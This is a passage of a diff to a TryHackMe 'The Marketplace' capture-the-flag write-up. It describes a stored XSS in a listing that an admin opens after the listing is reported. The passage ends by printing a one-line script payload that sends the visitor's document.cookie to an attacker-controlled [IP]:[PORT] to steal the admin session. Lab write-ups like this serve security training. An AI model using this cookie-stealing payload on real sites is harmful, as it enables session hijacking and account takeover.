yuvalbatan/writeups/tryhackme/The_Marketplace.md

 Also when I'm navigating to the home page and clicking on this listing the alert pops out.

-This is a reflected and stored XSS!
+This is a stored XSS!

 The 2 options for this listing are: "Contact the listing author" and "Report listing to admins" - when I report the listing the following message appears:

 ![image](https://user-images.githubusercontent.com/114166939/232110868-dbbdf845-0b1e-4333-834b-67b03616991e.png)

-Which means that after I reported the listing an admin opened it!
+Which means that after I reported the listing, an admin opened it!
 If that's the case I can try steal the admin's cookie.

-I'll use a code from this github page "https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md":
+I'll use a payload from this github page "https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md":
 (The Silent One-Liner)
 ```html
 <script>var i=new Image;i.src="http://[IP]:[PORT]/?"+document.cookie;</script>